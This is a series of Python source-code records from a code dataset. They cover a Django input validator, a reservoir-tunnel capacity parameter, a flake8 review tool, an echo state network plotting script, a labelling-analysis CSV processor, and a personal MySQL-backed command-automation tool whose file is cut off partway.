parameterName in self.requestQueryDictionary or len(self.requestQueryDictionary[parameterName]) == 0:\n return ResponseParser.getParsedValidMessage(parameterName)\n\n elif parameterConstraint == constants.TYPE_PHONE:\n if not parameterName in self.requestQueryDictionary or not len(self.requestQueryDictionary[parameterName]) == 10:\n return ResponseParser.getParsedValidMessage(parameterName)\n\n elif parameterConstraint == constants.TYPE_DEVICE:\n if not parameterName in self.requestQueryDictionary or not self.requestQueryDictionary[parameterName] in constants.DEVICE_TYPES:\n return ResponseParser.getParsedValidMessage(parameterName)\n\n elif parameterConstraint == constants.TYPE_EMAIL:\n if not parameterName in self.requestQueryDictionary:\n return ResponseParser.getParsedValidMessage(parameterName)\n if not self.validateEmail(self.requestQueryDictionary[parameterName]):\n return ResponseParser.getParsedValidMessage(parameterName)\n\n elif parameterConstraint == constants.TYPE_LATLONG:\n if not parameterName in self.requestQueryDictionary:\n return ResponseParser.getParsedValidMessage(parameterName)\n if not self.validateLatLong(self.requestQueryDictionary[parameterName]):\n return ResponseParser.getParsedValidMessage(parameterName)\n\n elif parameterConstraint == constants.TYPE_USERID:\n if not parameterName in self.requestQueryDictionary:\n return ResponseParser.getParsedValidMessage(parameterName)\n if not self.validateUserID(self.requestQueryDictionary[parameterName]):\n return ResponseParser.getParsedValidMessage(parameterName)\n\n return ResponseParser.gerGenericErrorMessage()\n\n\n def validateEmail( self,email ):\n from django.core.validators import validate_email\n from django.core.exceptions import ValidationError\n try:\n validate_email( email )\n return True\n except ValidationError:\n return False\n\n\n def validateLatLong(self,latLong):\n latLongRegex = re.compile(\"^(\\+)?(\\-)?([\\d]{1,3})(\\.)(\\d+)$\")\n if not latLongRegex.match(latLong):\n return False\n else:\n return True\n\n def convertToDict(self,queryDict):\n outputDict = {}\n for key in queryDict:\n value = queryDict[key]\n outputDict[key] = value\n return outputDict\n\n def validateUserID(self,userID):\n try:\n userObject = PapsterUser.objects.get(userID = userID)\n return True\n except ObjectDoesNotExist:\n return False\n except MultipleObjectsReturned:\n return False","sub_path":"api/core/validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":6515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"206376256","text":"from sierra.base_parameters import BaseParameter\n\nfrom sierra.utilities.converter import convert\n\n\nclass Upper_Collierville_Tunnel_1_Capacity(BaseParameter):\n\n def _value(self, timestep, scenario_index):\n capacity_cms = 800 / 35.31 # cfs to cms\n if self.model.mode == 'scheduling':\n if (6, 1) <= (timestep.month, timestep.day) <= (8, 1):\n capacity_cms = 100 / 35.31\n union_utica = self.model.nodes['Union-Utica Reservoir']\n # relief_reservoir = self.model.nodes['Relief Reservoir']\n if timestep.index == 0:\n prev_storage = union_utica.initial_volume\n else:\n prev_storage = union_utica.volume[scenario_index.global_id]\n prev_storage /= 1.2335\n\n if prev_storage <= 2:\n capacity_cms = 0\n elif prev_storage <= 3:\n capacity_cms = 150 / 35.31\n elif prev_storage <= 4:\n capacity_cms = 300 / 35.31\n\n else:\n capacity_cms *= self.days_in_month\n\n return capacity_cms\n\n def value(self, timestep, scenario_index):\n try:\n return convert(self._value(timestep, scenario_index), \"m^3 s^-1\", \"m^3 day^-1\", scale_in=1,\n scale_out=1000000.0)\n except Exception as err:\n print('\\nERROR for parameter {}'.format(self.name))\n print('File where error occurred: {}'.format(__file__))\n print(err)\n\n @classmethod\n def load(cls, model, data):\n return cls(model, **data)\n\n\nUpper_Collierville_Tunnel_1_Capacity.register()\n","sub_path":"sierra/models/stanislaus/_parameters/Upper_Collierville_Tunnel_1_Capacity.py","file_name":"Upper_Collierville_Tunnel_1_Capacity.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"559236707","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.11-x86_64/egg/reviewbot/tools/flake8.py\n# Compiled at: 2018-07-31 04:26:56\n\"\"\"Review Bot tool to run flake8.\"\"\"\nfrom __future__ import unicode_literals\nfrom reviewbot.tools import Tool\nfrom reviewbot.utils.process import execute, is_exe_in_path\n\nclass Flake8Tool(Tool):\n \"\"\"Review Bot tool to run flake8.\"\"\"\n name = b'flake8'\n version = b'1.0'\n description = b'Checks Python code for style and programming errors.'\n timeout = 30\n options = [\n {b'name': b'max_line_length', \n b'field_type': b'django.forms.IntegerField', \n b'default': 79, \n b'field_options': {b'label': b'Maximum Line Length', \n b'help_text': b'The maximum line length to allow.', \n b'required': True}},\n {b'name': b'ignore', \n b'field_type': b'django.forms.CharField', \n b'default': b'', \n b'field_options': {b'label': b'Ignore', \n b'help_text': b'A comma-separated list of errors and warnings to ignore. This will be passed to the --ignore command line argument (e.g. E4,W).', \n b'required': False}}]\n\n def check_dependencies(self):\n \"\"\"Verify that the tool's dependencies are installed.\n\n Returns:\n bool:\n True if all dependencies for the tool are satisfied. If this\n returns False, the worker will not be listed for this Tool's queue,\n and a warning will be logged.\n \"\"\"\n return is_exe_in_path(b'flake8')\n\n def handle_file(self, f, settings):\n \"\"\"Perform a review of a single file.\n\n Args:\n f (reviewbot.processing.review.File):\n The file to process.\n\n settings (dict):\n Tool-specific settings.\n \"\"\"\n if not f.dest_file.lower().endswith(b'.py'):\n return\n path = f.get_patched_file_path()\n if not path:\n return\n output = execute([\n b'flake8',\n b'--exit-zero',\n b'--max-line-length=%s' % settings[b'max_line_length'],\n b'--ignore=%s' % settings[b'ignore'],\n path], split_lines=True)\n for line in output:\n try:\n line = line[len(path) + 1:]\n line_num, column, message = line.split(b':', 2)\n f.comment(message.strip(), int(line_num))\n except Exception:\n pass","sub_path":"pycfiles/reviewbot_worker-1.0.1.1-py2.7/flake8.py","file_name":"flake8.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"4776714","text":"# -----------------------------------------------------------------------------\n# Gated working memory with an echo state network\n# Copyright (c) 2018 Nicolas P. Rougier\n#\n# Distributed under the terms of the BSD License.\n# -----------------------------------------------------------------------------\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom data import generate_data, smoothen\nfrom model import generate_model, train_model, test_model\n\n\nif __name__ == '__main__':\n \n # Random generator initialization\n np.random.seed(123)\n \n # Testing data\n n_gate = 1\n n = 2500\n values = smoothen(np.random.uniform(-1, +1, n))\n ticks = np.random.uniform(0, 1, (n, n_gate)) < 0.01\n data = generate_data(values, ticks)\n\n y = data[\"input\"][0,0]\n output = []\n states = np.zeros((3,len(data)))\n a = 1000\n b = .001\n \n for i in range(len(data)):\n v,t = data[\"input\"][i]\n x0 = states[0,i] = b*v\n x1 = states[1,i] = b*v + a*t\n x2 = states[2,i] = a*t + b*y\n y = (np.tanh(x0) - np.tanh(x1) + np.tanh(x2))/b\n output.append(y)\n\n model = {\"output\" : np.array(output).reshape(len(output),1),\n \"state\" : np.array(states) }\n error = np.sqrt(np.mean((model[\"output\"] - data[\"output\"])**2))\n print(\"Error: {0}\".format(error))\n\n # Display\n fig = plt.figure(figsize=(14,6))\n fig.patch.set_alpha(0.0)\n n_subplots = 4\n\n ax1 = plt.subplot(n_subplots, 1, 1)\n ax1.tick_params(axis='both', which='major', labelsize=8)\n ax1.plot(data[\"input\"][:,0], color='0.75', lw=1.0)\n ax1.plot(data[\"output\"], color='0.75', lw=1.0)\n ax1.plot(model[\"output\"], color='0.00', lw=1.5)\n X, Y = np.arange(len(data)), np.ones(len(data))\n C = np.zeros((len(data),4))\n C[:,3] = data[\"input\"][:,1]\n ax1.scatter(X, -0.9*Y, s=1, facecolors=C, edgecolors=None)\n ax1.text(-25, -0.9, \"Ticks:\",\n fontsize=8, transform=ax1.transData,\n horizontalalignment=\"right\", verticalalignment=\"center\")\n ax1.set_ylim(-1.1,1.1)\n ax1.yaxis.tick_right()\n ax1.set_ylabel(\"Input & Output\")\n ax1.text(0.01, 0.9, \"A\",\n fontsize=16, fontweight=\"bold\", transform=ax1.transAxes,\n horizontalalignment=\"left\", verticalalignment=\"top\")\n\n\n for i in range(3):\n ax = plt.subplot(n_subplots, 1, 2+i, sharex=ax1)\n ax.tick_params(axis='both', which='major', labelsize=8)\n ax.set_ylim(-0.001, +0.001)\n ax.yaxis.tick_right()\n ax.text(0.01, 0.9, chr(ord(\"B\")+i),\n fontsize=16, fontweight=\"bold\", transform=ax.transAxes,\n horizontalalignment=\"left\", verticalalignment=\"top\")\n ax.plot(model[\"state\"][i,:], color='k', alpha=.5, lw=.5)\n ax.set_ylabel(\"Activity\")\n ax.set_yticks([-0.001,0.001])\n ax.set_yticklabels([\"$-10^{-3}$\",\"$+10^{-3}$\"])\n \n \n plt.tight_layout()\n plt.savefig(\"figure5.pdf\")\n plt.show()\n","sub_path":"figure5.py","file_name":"figure5.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"69267981","text":"#from main_script import read_mhunter_csv, calculate_labelling, read_atomic_composition\nimport SauerFunction as sf\nfrom SauerClass import Record, Labelling\nimport argparse\n\n\n\n# Read all the relevant files\n#records = sf.read_mhunter_csv('sample_files/sample_input_data.csv')\n#atomic_composition, N_dict = sf.read_atomic_composition('sample_files/sample_input_formulae.csv')\n#fp = open('sample_files/out_temp.csv', 'w')\n\n\nparser = argparse.ArgumentParser(description='Do enrichment analysis.')\nparser.add_argument('-1','--input_data', help='Input data file name', required=True)\nparser.add_argument('-2','--input_formulae', help='Input formulae file name', required=True)\nparser.add_argument('-o','--output_filename', help='Name of output file', required=True)\nargs = vars(parser.parse_args())\n\nrecords = sf.read_mhunter_csv(args[\"input_data\"])\natomic_composition, N_dict = sf.read_atomic_composition(args[\"input_formulae\"])\nfp = open(args[\"output_filename\"], 'w')\n\n\nlabelling_list = []\nmax_results_length = 0\n\nfor record in records:\n results_dict = sf.calculate_labelling(record, N_dict, atomic_composition)\n for key, value in results_dict.items():\n if len(value) > max_results_length:\n max_results_length = len(value)\n labelling_list.append(Labelling(record.get_name(), results_dict))\n\nfp.write(\"Species, Labelling Source, Sample Name, Labelling %,\")\nfor i in range(max_results_length-1):\n fp.write(\"m\" + str(i) + \",\")\nfp.write(\"\\n\")\n\nfor label in labelling_list:\n species = label.get_species()\n label_dict = label.get_label_dict()\n names = label_dict.keys()\n names = sorted(names)\n i = 0\n for name in names:\n for key, value in label_dict.items():\n if name == key:\n fp.write(species + ',')\n if len(key.split(',')) == 2:\n fp.write(key.split(',')[1].strip('\"') + ',')\n fp.write(key.split(',')[0].strip('\"') + ',')\n else:\n fp.write(' ,')\n fp.write(key + ',')\n for val in value:\n fp.write(str(val) + ', ')\n fp.write('\\n')\nprint(\"Process complete; wrote out results.\")\n\n","sub_path":"proc.py","file_name":"proc.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"375625735","text":"#!/usr/bin/env python3\n#-*-coding:utf-8-*-\nimport getpass\nimport json\nimport os\nimport socket\nimport subprocess\nimport sys\nimport threading\nimport time\n\nimport mysql\nimport mysql.connector\n\nfrom Library.DBook import Database\nfrom Library.TBook import Tools\n\n\nclass Creator():\n def __init__(self) :\n self.MagicWord=self.getModuleData(\"localDbPassword\",\"Tobias\") \n\n def choiceList(self):\n \"\"\"SETUP THE FIRST MENU\"\"\"\n \n eachChoices = [\n \"Créer un bloc\",\n \"Créer une fonctionnalité\",\n \"Lancer une fonctionnalité\",\n ] #Choices the user can choose to move on\n\n execute = {\n \"1\" : \"self.createBloc()\",\n \"2\" : \"self.createFeature()\",\n \"3\" : \"self.feature()\"\n } #Action launched when the user chooses a number\n\n os.system(\"clear\")\n\n for element in range(eachChoices.__len__()): #Fetch choices\n \n print(f\"({element+1}) {eachChoices[element]} |\",end = \" \\n\") #Display the menu\n\n answer = input(\"----> Votre choix : \")\n\n for keys,values in execute.items() : # If the answer is correct, check what the answer does\n if answer is keys :\n exec(values)\n else : #If not, do while the answer is not a key\n while answer != keys :\n answer = input(\"----> Votre choix : \")\n if answer is keys :\n exec(values)\n\n def createBloc(self):\n\n os.system(\"clear\")\n\n self.nom = input(\"Nom du bloc : \")\n self.category = input(\"Catégorie du bloc [ Primaire | Secondaire | Script | multipleInput ]: \")\n self.command = input(\"Commande à Éxecuter: \\n > \")\n \n if self.category != \"Primaire\":\n self.pattern = input(\"Emplacement dans le pattern: \\n > \")\n else :\n self.pattern = 0\n\n Database(\"creator\",\"id\",\"name\",\"type\",\n \"command\",\"category\",\"pattern\",\n \"NULL\",f\"{self.nom}\",\"Bloc\",f\"{self.command}\",\n f\"{self.category}\",f\"{self.pattern}\").insertInDatabase()\n\n print(\"Bloc créer avec succès\")\n time.sleep(1)\n self.choiceList()\n # Tools().Notification(\"Block Successfully Created\")\n\n def fill(self):\n self.MagicWord=self.getModuleData(\"localDbPassword\",\"Tobias\")\n \n self.mydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n passwd=self.MagicWord, port=\"8889\",\n )\n\n self.primaryContent = []\n self.secondaryContent = []\n self.featureContent = []\n self.globalContent = []\n self.globalPrimaryItems = []\n self.Weird = []\n self.scriptContent = []\n self.multipleContent = []\n\n Command = self.mydb.cursor()\n Command.execute(\"USE tobiasdb\")\n Command.execute(\"SELECT DISTINCT(name) FROM creator WHERE category='Primaire' AND type='Bloc'\")\n\n for x in Command:\n for lettre in x :\n self.primaryContent.append(lettre)\n\n\n Command = self.mydb.cursor()\n Command.execute(\"USE tobiasdb\")\n Command.execute(\"SELECT DISTINCT(name) FROM creator WHERE category='Primaire' AND type='Bloc'\")\n\n for x in Command:\n for lettre in x :\n self.primaryContent.append(lettre)\n\n Command.execute(\"USE tobiasdb\")\n Command.execute(\"SELECT DISTINCT(name) FROM creator WHERE category='Secondaire' AND type='Bloc'\")\n\n for x in Command:\n for lettre in x :\n self.secondaryContent.append(lettre)\n\n Command.execute(\"USE tobiasdb\")\n Command.execute(\"SELECT DISTINCT(name) FROM creator WHERE category='Script' AND type='Bloc'\")\n\n for x in Command:\n for lettre in x :\n self.scriptContent.append(lettre)\n\n Command.execute(\"USE tobiasdb\")\n Command.execute(\"SELECT DISTINCT(name) FROM creator\")\n\n for x in Command:\n for lettre in x :\n self.globalContent.append(lettre)\n\n Command.execute(\"USE tobiasdb\")\n Command.execute(\"SELECT DISTINCT(name) FROM creator WHERE type='Feature'\")\n\n for x in Command:\n for lettre in x :\n self.featureContent.append(lettre)\n\n Command.execute(\"USE tobiasdb\")\n Command.execute(\"SELECT DISTINCT(name) FROM creator WHERE category='multipleInputs'\")\n\n for x in Command:\n for lettre in x :\n self.multipleContent.append(lettre)\n\n Command.execute(\"USE tobiasdb\")\n Command.execute(\"SELECT DISTINCT(name) FROM creator WHERE category='Primaire'\")\n\n for x in Command:\n for lettre in x :\n self.globalPrimaryItems.append(lettre)\n\n os.system(\"clear\")\n blocDisplayed = []\n\n for i in range(0,len(self.multipleContent)):\n if len(self.multipleContent) == 0 :\n print(\"Aucun bloc prenant plusieur points d'entrées\")\n else :\n print(self.multipleContent[i]+\"\\n\")\n blocDisplayed.append(self.multipleContent[i])\n print(\" \"+\"_\"*len(self.multipleContent[i]))\n print(\"|\"+self.multipleContent[i]+\"|\"+f\" Bloc à MultiInput | Command : [{self.getCommand(self.multipleContent[i])}]\")\n print(\" \"+\"-\"*len(self.multipleContent[i]))\n\n for i in range(0,len(self.primaryContent)):\n if len(self.primaryContent) == 0 :\n print(\"Aucun blocs Primaires\")\n else :\n print(\" \"+\"_\"*len(self.primaryContent[i]))\n blocDisplayed.append(self.primaryContent[i])\n print(\"|\"+self.primaryContent[i]+\"|\"+f\" Bloc Primaire | Command : [{self.getCommand(self.primaryContent[i])}]\")\n print(\" \"+\"-\"*len(self.primaryContent[i]))\n\n for i in range(0,len(self.secondaryContent)):\n if len(self.secondaryContent) == 0 :\n print(\"Aucun blocs Secondaires\")\n else :\n print(\" \"+\"_\"*len(self.secondaryContent[i]))\n blocDisplayed.append(self.secondaryContent[i])\n print(\"|\"+self.secondaryContent[i]+\"|\"+f\" Bloc Secondaire | Command : [{self.getCommand(self.secondaryContent[i])}]\")\n print(\" \"+\"-\"*len(self.secondaryContent[i]))\n\n for i in range(0,len(self.scriptContent)):\n if len(self.scriptContent) == 0 :\n print(\"Aucun blocs Scripts\")\n else :\n print(\" \"+\"_\"*len(self.scriptContent[i]))\n blocDisplayed.append(self.scriptContent[i])\n print(\"|\"+self.scriptContent[i]+\"|\"+f\" Bloc Scripts | Command : [{self.getCommand(self.scriptContent[i])}]\")\n print(\" \"+\"-\"*len(self.scriptContent[i]))\n\n if len(self.blocList) != 0 :\n print(f\"Vos blocs sélectionnés : {self.blocList}\")\n print(\"_______________________________________________________________\")\n nextAction = input(\"\\n(1) Utiliser un bloc \\n(2) Chercher par lettres \\n(3) Créer une fonctionnalité avec les blocs actuelles \\n(4) Supprimer un bloc de la pioche \\n(5) Retour \\n----> Votre choix : \")\n \n self.goodWords = []\n good = 1\n\n choices = [\"1\",\"2\",\"3\",\"4\",\"5\"]\n for y in range(len(choices)):\n if choices[y] == nextAction :\n good = 0\n\n if good != 0 :\n for i in range(len(blocDisplayed)):\n if nextAction == blocDisplayed[i]:\n self.blocList.append(nextAction)\n self.fill()\n else :\n if blocDisplayed[i].count(nextAction) > 0:\n self.goodWords.append(blocDisplayed[i])\n\n if len(self.goodWords) == 0:\n print(\"Votre bloc n'existe pas\")\n time.sleep(0.5)\n self.fill()\n else: \n\n for i in range(len(self.goodWords)):\n print(f\"Bloc correspondant à la description {self.goodWords[i]}\\n ------\")\n \n answer = input(\"Lequel est ce ? [nom/aucun] \\n ----> Votre choix : \")\n if answer == \"aucun \":\n self.fill()\n else : \n self.blocList.append(answer)\n self.fill()\n\n\n if nextAction == \"1\" :\n\n blocToSelect = input(\"Quel est son nom ou numéro ? \\n : \")\n right = 0\n for i in range(len(blocDisplayed)):\n if blocToSelect != blocDisplayed[i] :\n right += 1\n if right == len(blocDisplayed) :\n print(\"Votre bloc n'existe pas\")\n time.sleep(0.5)\n self.fill()\n else :\n self.blocList.append(blocToSelect)\n self.fill()\n\n elif nextAction == \"2\" :\n count = 0 \n blocToSearchFor = input(\"Quel est son nom ? \\n : \")\n for i in range(len(blocDisplayed)):\n if blocDisplayed[i].count(blocToSearchFor) > 0:\n count +=1 \n print(f\"Bloc correspondant à la description {blocDisplayed[i]}\\n ------\")\n answer = input(\"Lequel est ce ? [nom/aucun] \\n ----> Votre choix : \")\n if answer == \"aucun \":\n self.fill()\n else : \n self.blocList.append(answer)\n self.fill()\n \n if count == 0:\n print(\"Votre bloc n'existe pas\")\n self.fill()\n\n elif nextAction == \"3\":\n if len(self.blocList) != 0:\n self.save()\n self.feature()\n else :\n print(\"[!] Votre pioche est vide...\")\n time.sleep(0.5)\n self.fill()\n\n elif nextAction == \"4\":\n if len(self.blocList) != 0:\n if len(self.blocList) == 1 : \n self.blocList.remove(self.blocList[0])\n self.fill()\n \n name = input(\"Nom du bloc à retirer \\n : \")\n \n if len(self.blocList) >1 : \n self.blocList.remove(name)\n self.fill()\n else :\n print(\"[!] Votre pioche est vide...\")\n time.sleep(0.5)\n self.fill()\n\n elif nextAction == \"5\":\n os.system(\"clear\")\n self.choiceList()\n\n else :\n self.fill()\n\n def save(self):\n os.system(\"clear\")\n foncName = input(\"Nom de la fonctionnalité ? \\n : \")\n indexObjets = []\n nObjets = len(self.blocList)\n\n #Récupérer les éléments\n indexObjets = self.blocList\n\n if nObjets > 0:\n Command = self.mydb.cursor()\n Command.execute(\"USE tobiasdb\")\n\n Command.execute(f\"INSERT INTO creator (id , name , type , command , category,pattern) VALUES (NULL , '{foncName}' , 'Feature' , \\\"{indexObjets}\\\", 'Primaire',0)\")\n self.mydb.commit()\n # Tools().Notification(\"Feature Successfully Added\")\n os.system(\"clear\")\n self.choiceList()\n\n def createFeature(self):\n os.system(\"clear\")\n self.fill()\n\n def feature(self):\n self.MagicWord=self.getModuleData(\"localDbPassword\",\"Tobias\")\n self.featureContent = []\n self.mydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n passwd=self.MagicWord, port=\"8889\",\n )\n\n Command = self.mydb.cursor()\n Command.execute(\"USE tobiasdb\")\n Command.execute(\"SELECT DISTINCT(name) FROM creator WHERE type='Feature'\")\n\n for x in Command:\n for lettre in x :\n self.featureContent.append(lettre)\n\n os.system(\"clear\")\n print(f\"Liste des fonctionnalités : {self.featureContent}\")\n featureToExecute = input(\"Que voulez vous éxecuter ? \\n : \")\n\n pattern = []\n\n self.mydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n passwd=self.MagicWord, port=\"8889\",\n )\n\n #Déterminer les éléments de type Fonctionnalité\n\n Command = self.mydb.cursor()\n Command.execute(\"USE tobiasdb\")\n Command.execute(f\"SELECT command FROM creator WHERE name='{featureToExecute}' AND category !='Script'\")\n\n for x in Command:\n for lettre in x :\n pass\n\n lettre = str(lettre)\n lettre = lettre.strip(\"[]\")\n lettre = lettre.replace(\"',\",\"\")\n lettre = lettre.replace(\"'\",\"\")\n firstStageCommands = lettre.split()\n\n #Déterminer les commandes de ces éléments\n for i in range(0,len(firstStageCommands)):\n Command = self.mydb.cursor()\n Command.execute(\"USE tobiasdb\")\n Command.execute(\"SELECT command FROM creator WHERE name='\"+firstStageCommands[i]+\"' AND type='Bloc' AND category!='Script'\")\n for x in Command:\n for lettre in x :\n firstStageCommands[i] = lettre\n\n for i in range(0,len(firstStageCommands)):\n Command = self.mydb.cursor()\n Command.execute(\"USE tobiasdb\")\n Command.execute(f\"SELECT command FROM creator WHERE name='{firstStageCommands[i]}' AND type='Bloc' AND category='Script'\")\n for x in Command:\n for lettre in x :\n a = subprocess.getoutput(lettre)\n firstStageCommands[i] = a\n pattern.append(a)\n\n Command = self.mydb.cursor()\n Command.execute(\"USE tobiasdb\")\n Command.execute(\"SELECT pattern FROM creator WHERE command='\"+lettre+\"' AND type='Bloc' AND category='Script'\")\n for x in Command:\n for lettre in x:\n pattern.append(lettre)\n\n #Check for Pattern\n for i in range(0,len(firstStageCommands)):\n Command = self.mydb.cursor()\n Command.execute(\"USE tobiasdb\")\n Command.execute(\"SELECT command,pattern FROM creator WHERE command='\"+firstStageCommands[i]+\"' AND type='Bloc' AND category='Secondaire'\")\n for x in Command:\n for lettre in x :\n pattern.append(lettre)\n\n list_of_strings = [str(s) for s in firstStageCommands]\n joined_string = \" \".join(list_of_strings)\n string = joined_string.split()\n stringList = []\n for i in range(0,len(string)):\n stringList.append(string[i])\n stringList.append(\" \")\n workingUnits = []\n byOne = []\n #Détermine les secteurs ayant besoin d'une modification\n pos = []\n var_pos = 0\n for sector in stringList:\n num = sector.count(\"$\")\n if num > 0:\n workingUnits.append(sector)\n pos.append(var_pos)\n var_pos +=1\n else :\n var_pos +=1\n\n #Change le string en liste de caractères\n for elements in range(0,len(workingUnits)):\n elementString = workingUnits[elements]\n for caracter in range(0,len(elementString)):\n byOne.append(elementString[caracter])\n byOne.append(\" \")\n\n byOne = byOne[:-1]\n val = 0\n #Change $n par la bonne valeur du pattern\n for cell in range(0,len(byOne)):\n if byOne[cell] == \"$\":\n if int(byOne[cell+1]) == 1:\n val = -1\n elif int(byOne[cell+1]) == 2:\n val = 0\n else :\n val +=1\n\n byOne[cell+1] = pattern[int(byOne[cell+1])+val]\n\n final = \"\"\n for i in byOne:\n final = final+str(i)\n final = final.replace(\"$\",\"\")\n final = final.split()\n\n finalList = []\n for i in range(0,len(final)):\n finalList.append(final[i])\n\n for i in range(0,len(stringList)):\n for y in range(0,len(pattern)):\n if stringList[i] == pattern[y]:\n stringList[i] = \" \"\n\n for i in range(0,len(pos)):\n stringList[pos[i]] = finalList[i]\n\n full = stringList\n if stringList.count(\"X1\") > 0:\n #TROUVER LA BOUCLE\n position = 0\n indexGet = []\n\n for i in range (0,len(stringList)):\n if stringList[i] == \"for\":\n indexGet.append(position)\n position +=1\n elif stringList[i] == \"end\" :\n indexGet.append(position)\n position +=1\n else :\n position +=1\n\n #TROUVER LE COMMENCEMENT ET LA FIN\n doing = []\n i = 0\n while i != int(len(indexGet)):\n start = indexGet[i]\n end = indexGet[i+1]\n\n start = int(start)\n end = int(end)\n\n #LES RECUPERER\n condition = stringList[start:end]\n stage_1 = condition[0:9]\n stage_1[6] = stage_1[8]\n numberOT = stage_1[8]\n stage_1.pop(8)\n i = i+2\n condition = stringList[start:end]\n\n condition[6] = stage_1[6]\n condition.pop(8)\n condition.pop(8)\n\n\n #GET THE THINGS THAT NEED TO BE DONE\n do = condition[7:end]\n do = \"\".join(do)\n doing.append(do)\n\n inputs=[]\n #Déterminer les commandes de ces éléments\n\n Command = self.mydb.cursor()\n Command.execute(\"USE tobiasdb\")\n Command.execute(\"SELECT command FROM creator WHERE category='multipleInputs' AND type='Bloc'\")\n for x in Command:\n for lettre in x :\n for i in range(0,len(stringList)):\n if lettre in stringList[i]:\n inputs.append(lettre)\n if len(inputs) == 0:\n inputs.append(numberOT)\n\n numberOI = 0\n try :\n numberOT = int(numberOT)\n numberOI = numberOT\n except:\n numberOT = None\n numberOI = len(inputs)\n\n for i in range(0,numberOI):\n if numberOT is not None:\n a = numberOT\n a = str(a)\n else :\n proc = subprocess.Popen(['python3', inputs[i]], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n a = proc.communicate()[0]\n a = a.decode(\"utf-8\")\n a = str(a)\n a = a.strip(\"[\")\n a = a.strip(\"]\")\n a = a[:-2]\n\n a = a.replace(\"',\",\"\")\n a = a.replace(\"'\",\"\")\n a = a.split()\n i=0\n while i != len(doing):\n word = doing[i]\n word = word.split()\n for k in range(0,len(word)):\n print(word)\n if word[k] == \"X2\":\n for y in range(0,len(a)):\n word[k] = a[y]\n word = \" \".join(word)\n print(word)\n os.system(word)\n word = do.split()\n i +=len(doing)\n\n\n #A REFAIRE\n for i in range(indexGet[0],indexGet[-1]+1):\n full[i] = \"TODELETE\"\n\n\n good = []\n for i in range(0,len(full)):\n if full[i] != \"TODELETE\":\n good.append(full[i])\n\n commande = \"\".join(good)\n print(f\"La commande à éxecuter est : {commande}\")\n os.system(commande)\n else :\n commande = \"\".join(stringList)\n print(f\"La commande à éxecuter est : {commande}\")\n os.system(commande)\n\n def getCommand(self,blocName):\n Command = self.mydb.cursor()\n Command.execute(\"USE tobiasdb\")\n Command.execute(f\"SELECT command FROM creator WHERE name='{blocName}' AND type='Bloc'\")\n\n for x in Command:\n for lettre in x :\n return lettre\n\nclass Tobias(Creator):\n\n def __init__(self):\n self.blocList = []\n self.confs = self.getPaths('path','ConfigurationJson')\n self.networkB = self.getPaths('network','sysCommandsDirectory')\n self.user = os.environ[\"USER\"] #User's name\n\n\n # try :\n # open(f\".started.txt\")\n\n # except IOError:\n\n # self.fromZeroToHero() #Working\n\n threadLogin = threading.Thread(target=self.login())\n threadLogin.start()\n\n def fromZeroToHero(self):\n\n \"\"\"Install needed packages\"\"\"\n packages = [\n \"python-nmap\",\n \"PyQt5\",\n \"notify2\",\n \"django\",\n \"django-debug-toolbar\",\n \"gtts\",\n \"pyshark\",\n \"nginx\",\n \"speechRecognition\" ,\n \"mysql\",\n \"mysql-connector\",\n \"paramiko\",\n \"install --pre scapy[basic]\",\n \"mechanicalsoup\",\n \"beautifulsoup4\",\n \"git\",\n \"pandas\",\n \"unidecode\"\n ]\n\n for i in range (0,len(packages)):\n a = subprocess.getoutput(f\"which {packages[i]}\")\n if a != f\"/usr/bin/{packages[i]}\" :\n #print(f\"{packages[i]} is not installed\")\n os.system(f\"pip3 install {packages[i]}\")\n\n os.system(\"clear\")\n\n with open(f\"/Users/{self.user}/Terminal/.started.txt\",\"w\") as variable :\n variable.write(\"Started\")\n\n def myIp(self,toSearch):\n \"\"\"Give my Ip Address and Mask\"\"\"\n if toSearch == \"ip\":\n try :\n\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((\"8.8.8.8\", 80))\n myIp=s.getsockname()[0]\n s.close()\n return myIp\n\n except OSError :\n\n myIp = subprocess.getoutput(\"ip a | egrep 'inet' | egrep 'brd' | awk '{print $2}' | sed -re 's/\\\\/..//g'|head -n1\")\n\n return myIp\n\n finally :\n\n osBasedIp = subprocess.getoutput(\"ip a | egrep 'inet' | egrep 'brd' | awk '{print $2}' | sed -re 's/\\\\/..//g' | head -n1\")\n\n if myIp != osBasedIp :\n raise Exception(\"IP Non concordante\")\n\n elif toSearch == \"mask\":\n\n mask = subprocess.getoutput(\"ip a | egrep \\\"inet\\\" | head -n3 | tail -1 | awk '{print $2}'\")\n return mask\n\n else :\n raise Exception(\"'ip' and 'mask' are the only parameters accepted\")\n\n def retour(self):\n question = input(\"\\nRevenir au menu principal ? [yes/no] \\n > \")\n if question == \"yes\":\n self.start()\n\n def initializeViolet(self):\n os.system(\"cd ./.Violet && ./Violet.py\")\n\n def start(self):\n\n os.system(\"clear\")\n print(f\"----------------- Bonjour {self.getModuleData('prenom')} -----------------\\n\")\n print(f\"[?] Violet : Computer Status --------\\n\")\n if self.myIp('ip') != None :\n print(f\"Network Access : YES \")\n else :\n print(f\"Network Access : NO \")\n\n print(f\"IP Address: {self.myIp('ip')}\")\n\n try :\n open(f\"/Users/{self.user}/Archetype/Tobi/Terminal/.Violet/Report.txt\")\n print(f\"Is Violet deployed : YES\\n\")\n print(\"Violet Report File Content: \\n\")\n with open(f\"/Users/{self.user}/Archetype/Tobi/Terminal/.Violet/Report.txt\",\"r\") as 